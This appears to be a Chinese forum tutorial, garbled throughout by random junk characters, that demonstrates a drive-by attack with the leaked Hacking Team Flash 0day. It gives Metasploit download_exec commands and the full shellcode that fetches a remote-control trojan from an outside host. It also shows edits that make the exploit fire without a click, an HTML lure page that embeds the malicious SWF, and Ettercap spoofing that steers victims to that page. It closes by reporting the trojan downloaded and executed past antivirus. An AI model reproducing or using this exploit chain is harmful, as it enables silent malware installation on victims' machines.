|
, P8 U1 ?7 m( ~ 三、flash 0day之手工代码修改制作下载者实例入侵演示 ! e6 L. ?. u5 C: k; [0 \0 y
: \( V5 K2 b h3 o6 D
! j$ L( e; ^9 s1 o1 ] 利用到的工具: 1 c6 N6 y, C1 A4 c8 x, F% j6 C
* a# B3 S; ?) y7 J; G. ]2 h$ [& ~$ G: V: m: j0 V
Msf 4 H' E, S9 `- Y0 K3 T+ A6 Q/ E
, p' g3 L2 |+ W: Z+ C' R: E- e! ^
Ettercap 5 f, L. ]+ f- V% g+ ]) v
2 r: ]1 c+ P# h
W* k! I2 q* v+ w8 N$ D/ I, n Adobe Flash CS6
# ?+ \0 N. ?# P) x, I4 ? , T' f* V" j; P1 c Z8 W" q
, H2 H6 X. x& H; w/ y
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份 9 z( h1 M E6 [% f* w
! R# q9 s5 y3 Q7 L: U
, a B1 |4 J5 O8 p% {8 U4 y5 I 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options 8 x$ ^1 \; e5 U* R7 Y* x. t: Z ?: Z
4 K! U1 B; H# g! [) e4 G
|1 |4 s; j' V, W8 j' M7 k0 t' e 如图: * E' a' ^6 i+ N/ ]' M* _% {
5 k0 y( @! e B# P( {$ Q$ N3 J& b( A/ S7 ~% H) J5 E5 V8 y
( P6 ^! t7 T I" f$ U
. W4 o. j" v# r1 b: o, E
2 X4 y5 w* {- A) p7 D
$ O( C% Y" {1 O% S
3 O% n, o. H& H: x( r" G
- T6 |9 t0 n9 v' D 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图:
/ O* `8 f; r, n- q, I. S
7 ~+ X3 F& x0 o4 l3 h8 y0 t8 K& \* T5 K: P& z7 A9 |3 T! a
* X! r& p. q( R2 y4 z% g # ~6 V9 T/ l$ W- t: }$ V
$ {2 m9 q6 `. ^8 R T+ r
& Z" o) ~$ o) n! }' R% B% C
1 {, ]5 h6 y2 g1 ?: z$ z4 a) ~& g* U& D2 T8 R
然后执行generate -t dword生成shellcode,如下: ; ~: p- L; C/ X$ C9 ?! d
2 [* W# B8 U1 \3 J; f( v( v8 g. D
6 B/ r5 Q" C$ S
; n2 k' ?2 f u7 F4 V. [: R) ?
% c' O: u2 Q; c3 `$ g: z9 B 复制代码到文本下便于我们一会编辑flash exp,如下: * T9 u, ]2 A" n3 L# p
. C' f7 ? W5 k
. \7 G" ~6 G z! M5 @ 0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, ( d8 U. o3 \" H) c+ z/ ^( P# w
% P$ G8 \) b0 k% V0 O& i; i( u. T
6 \. U. y; X, X6 n1 n' R1 h1 v% b+ T 0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
8 [; W4 i/ m5 K% I/ @$ V- }: m \4 y5 a0 f$ ?6 i
3 T3 Y* D. }9 @ 0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038,
) b) Q( d8 j u3 j7 v; i2 A
2 w E* l! }7 h6 F7 E! s& W; K7 {: r0 l
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489, 2 y8 @- O* V+ t+ [- x1 n( a' ?
/ m) A" I2 H; r& |
1 z, W6 F6 @3 A( P y; _0 l 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
* t# b9 ~/ f) g ~* N) ~- ?
& g! j. E% R8 g+ K4 x$ D$ H$ @8 S' T2 n( [
0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, - z' e4 p- [3 F. b" {
, W; O5 s8 `9 u4 l* h
, L; {; [% ?# B( K6 b2 Q 0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
F5 ?0 q5 _ e5 l+ A0 q D 9 N: \6 T( m" }0 n
( @" f* L3 o" R1 }' u 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 9 M) X) {/ x6 S. }3 N+ r. y3 s
# B3 T1 W3 G: }- J! z2 @7 u. w+ }# A
0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff, . Y8 N2 V5 u& @9 u$ `
4 [; m% ]# z' ^2 F5 T
4 w3 ^. a6 M, z0 e6 j" n0 V+ r) | 0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
2 c! h+ u9 ^. ?6 Z3 G
3 D! A* O$ q8 o7 f
: x' {( G1 U9 b; o( L1 s# r 0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, 1 t5 a( _6 R! G- a5 k+ X
3 O& A% f$ {3 c! l8 P$ X, t7 z( O# I( |6 r
0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, 5 P' n5 o% [+ }8 L
: |& ?* |4 E7 X7 }5 U
% k! T/ ]% p% C/ ?* [: ?" S 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973, : i. O+ C; u ?5 i! h
; a% g: z( W. l7 g m
' x7 g8 f1 J7 t+ F 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000 l9 i% v$ w& g1 g a
- G, I% d$ ~: H5 B, K" ]
8 e$ e/ V. w3 x" X) W% l ; u: o/ b0 W5 `
$ O: w( c9 S: g6 \( I# O' W2 f( ]5 D& V1 A D
- o6 y; _! L, {5 [6 i# M1 O ) B; M3 x9 ~9 n7 O: T8 ~' ~5 v
$ G9 v) C, E2 B; Q- K$ u 下面我们来修改flash 0day exp,需要修改三个文件,分别为:
( t, o! K& t; T' d+ R1 l) q
/ m, ~0 v4 @$ D/ G) m2 m7 v. I
. b5 v1 {* S9 c% B& T3 _" C
, N6 {* e; u+ \! S* e+ f
! c! x0 J& p6 ?9 T" R; z E4 o- Z
2 i' i5 F3 P+ B. U 先修改ShellWin32.as,部分源代码如图:
3 ?# T2 `9 |# n4 a |
) F- O+ i# b4 z9 T. }5 W- |, k$ \# x
2 J8 ^# b! _7 ]$ k1 J9 q1 W0 O
; b# y. D' [% V2 W% X4 \
) S. b$ u% c+ i! f! A: `/ K 我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
$ u# M! @! @0 H, z4 S x - I4 l. M& `( L& i p6 n5 F. i
( v' E- d" L, [$ S2 \( d& \
' G4 c- u4 z3 w/ `
' @8 p. B: Z8 L' S K" R5 S- @: N: T
然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图:
9 w" x& L" Q2 R. [$ a# J
3 Q) V& g( _, x" J. R) S- {2 a4 I' G$ c2 | P6 D. k. K% H; H5 S/ f; [
; X/ Q+ w4 S7 @$ V8 p 4 p- e* `6 A4 m
6 Y/ R! L7 J" b7 b# o7 c# v& o 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
& `9 C; _/ D7 j+ @7 }
# P7 Z& r5 [+ K. R$ b5 A6 c. i4 W
H! p2 \5 h: V' H8 m* q2 j
: P. D1 u$ A2 F% R9 a4 N' h: i2 `; c& g L7 n7 _5 A( ~& |9 C
! O- P2 K3 S+ x
: z& ]0 r6 y2 M8 V! X/ C
1 b% j6 f5 P2 }6 \! n, ]7 u% S
- g/ A% D9 R0 n7 a% `5 a8 P2 s' `
0 c" k# r ?8 C% K4 U4 d
2 b1 J) H J$ ~6 f! m1 e/ E 然后点保存,下面我们来编译一下,打开 7 K0 v' F/ Q) q, r V( ?7 ^
; k v0 d& ~* _2 i5 f* T
+ m+ J, j% W8 C. `2 H
exp1.fla然后点文件-发布,看看编译没错误
( a7 L2 {' f* F. o 2 C( G6 l1 h" `) u1 c$ x Z. i
% F8 }) s ]; e: P2 k ?0 p
; D% I1 P _) f8 b
& Y2 B+ h& j1 @# b6 c) B6 h% n5 q5 @& y" r, Q, z1 q' T
8 [4 E$ z# i6 o# [0 L# j * ^; n" [8 j i3 t8 ?
. a5 j( m; E0 C* {- }7 e% ~# Y
& t1 ]' J$ ] Z) m! l" j
( Z, R5 U$ v- k% ~9 _; p, ~4 n2 B% p& H, K+ S8 ?! F
2 P0 [+ b2 K& E6 B9 Z7 n " E# ^/ f3 a* U0 C( x
* a# t! b; o0 ~- A+ ~) \6 t; O8 G" I- U
然后我们把生成的
. W. h# _7 B+ }3 r0 F/ c. o& x
0 h1 g$ r, p$ x1 P5 ~1 b4 G, |: i* Z2 W( Z
exp1.swf丢到kailinux 的/var/www/html下:
8 l, R9 I' y9 T7 s4 k 9 _" r) s) d: W7 W% L" K
6 h8 a& A, k+ l" e3 v0 s2 Q. C
然后把这段代码好好编辑一下
# q3 ^% @% M0 I% z: o% Q2 L
$ t& c9 d( L- D
7 a# d* D4 m5 { 3 ~; u/ K0 b; x1 E8 L' s1 Z
! _# V1 j/ O, |: d3 ?$ f8 Z! I0 L4 }$ H* T/ ^1 H) u+ \, q7 R* A
: h! ^) Z7 ? k/ K7 Y
7 x; v$ Y+ z" C; R6 N& A& e/ f* n
& S; n+ I2 I4 r0 @: w
0 s( `3 b3 K3 ]3 v2 I1 t6 ?' _5 l 8 e( P6 T$ m/ J4 q& x
! b V, @" f2 y" `
; e' r% Z9 r: {; \1 \5 } `' P
5 }! i0 T/ ~0 c5 x
% A% ~! O3 c- {) r1 s! k# A 0 u6 u7 }2 {! r3 H& X
4 M; V' m C; {) u
$ Z& Y$ v2 ~* h' C; y7 H
. j7 `7 `8 q; _+ J( { ; p/ C c( u l/ N$ Y. O. {8 V0 F
5 r" `1 o9 I5 q) s <!DOCTYPE html> ! D# J- S f& G" D9 A6 k/ {% s
- H& a& \0 Y4 ], G
( N+ h1 q, @1 ]3 {3 v" @ <html>
# P8 d# W* i$ C ) @6 N! C( a3 ]! l) D. Y
/ E2 m7 F! ?; W! t/ v! i4 K
<head> " ]7 Z) b7 K0 N2 L/ r
8 Q' r& ^% d" B& J1 h
* W! b' C" K. F+ g <meta http-equiv="Content-Type" content="text/html;
. w* q8 {7 o6 d6 G& k _1 K ' D" \5 c1 T' y9 v# \
{7 Q. K2 j. {( `3 V8 |/ [. i charset=utf-8"/> ' S0 |" Z8 V& P: ^( z) {
* ~( W% W# j* Q
; d! I4 k" ~8 J5 r8 T2 Q
</head> 9 c3 n8 u9 z1 p' h& b3 B' Q/ O
, `+ \9 A) {. ~
/ Q+ [. P# z8 E+ W9 v0 K' \2 t <body> * E4 f k; _( ~; K; n7 O; {0 g' V
/ L, u) ~2 s, b1 z& f8 H8 j
: u8 G0 V, w0 B8 } v' J L <h2> Please wait, the requested page is loading...</h2> 1 M7 N. ?, g' P9 o4 z- b( z
/ v1 z& T. \2 v7 C6 K. p
! f! l2 J% M$ ?6 d; l
<br> 4 @1 w0 A) I& J
5 U- s% _8 U& E% c# x4 v) S- F6 S1 Y' h4 B" B
<OBJECT ; K* X8 ^4 \$ C$ g
2 E* I# Q+ \2 {, e8 y+ A
8 T* r$ f5 @, Y& g Y) x, i8 Y classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
( \1 ~( r* N+ _: ~ 8 s' I$ |5 ?' d
" d8 Z3 v& c4 v: A
VALUE="http://192.168.0.109/exp1.swf"></OBJECT> 8 ?* R' ~, X- O/ z
3 g' h% u* n* j. ]% {; @9 k
T, I3 ~1 D0 ^# g2 _- J2 e
</body>
3 b* G7 Z9 d7 z
+ V2 u8 w3 y7 b$ q+ ~# K
- E* h, f0 O6 S0 @9 @7 N. m <script>
# L0 b* d* p) W 9 k# `( x! I+ P$ t6 ~; U! W" G
( L: r! r. L) E, D
setTimeout(function () { 6 a. Q" P; L' o! J9 @" |
: h* }. u" E3 k+ D
6 l! a' B- z' `1 G3 r! ?2 k) j
2 A( }& E2 U- L( N. L
& P5 W) ~; H) P/ d9 c+ B, [, r- j
; h& q! I7 o( |' d/ L- n window.location.reload();
$ ]5 V! v0 ?+ ?* ^! m; A5 X2 D) K
7 ~ o7 x4 f7 @0 l, u* K3 B6 g% X3 x: q1 O2 @( B! I
}, 10000); " H7 e5 [ {% `
8 M/ O5 s/ T1 {
" o' Y. T. ?# E4 c
" Y5 K3 _1 `' r ~
" z1 V( a+ B5 C4 X O9 ~. |3 A: @8 b( }
</script>
; _8 D0 @3 X" x. o3 Z . T7 m9 F, I/ e; W% W
) X7 Y3 }! r' S </html>
) m* ?( F! v( V# B# B
% B, C) l9 J# U9 ~ Z6 G- d5 r- p
- g9 n D! d @' Q$ |
4 P( T. \0 A: K0 m5 V* _9 t4 A ' o" D G8 y4 o3 y& w
# t2 T& F, K9 q8 E, S% ~ 注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: ) S6 S+ @, e* ]- u( u
) r2 |. o; m. A; Y) U- W$ E
s1 D$ D/ @, y$ } R
: I _! V4 b4 ?
4 }& c# a3 j& D6 U" s8 B
1 P: e- G0 ?( ~% _) c# e- W ; i ]% S# B! k$ n; [
* a6 U& {2 { l! y' g4 O
5 j( h& v% S5 A3 G
# C" p: z) K3 v- `
: w4 g! T. W3 k. c! K( `: g$ x
; p& }5 L8 [% V* j& r$ K) m
3 }- _1 F9 x7 K% L; f* ~4 W2 n
! b+ h& o: X, o/ j
( |( k* @8 u3 q4 F4 i8 E ~
. k, f O/ }" r; m( }* ?- |
0 S, P4 p) D$ W* K" `* z. D& A2 C& m# A2 J
下面我们用ettercap欺骗如图: " z" M- o0 J* H; K, Y7 B, C# }* S
' Z5 |. ^; i4 k( R# c$ U( z
2 g0 Q( _2 d8 y' d, @! M
' t: _1 C/ @. B3 j
" P3 z$ K* }. D4 Y2 O1 W$ X% \$ q' C+ k2 a+ m! c
, O0 D7 p* @ V! r) t 9 v: B2 j. u6 [( d
/ ]( B) _' X6 K$ Z9 K$ b4 S# R& X* v' Z( T 下面我们随便访问个网站看看:
4 H7 l1 K7 Q$ p) ^9 u 5 \6 u9 p, s n# i, `# I% ]! t
' i' l+ N9 p1 t$ b- S; u0 n 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图: J _3 a1 M B2 N- z9 E/ K" i
. @) I9 ]8 T6 L/ B) w, W3 W6 t. f. a* M
- J0 V$ N" v% U) q6 [& |
9 X3 s+ s+ p3 C% d/ d5 q1 O' D% u! u% f. M
我们看另一台,
+ ]% n' c$ H9 P6 l7 B7 i
5 A* A/ ?+ V% o0 t; N
* @# c2 X* Q5 t. Q+ N8 t 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。 # ?- a; [4 y. \# v) }) [4 N
|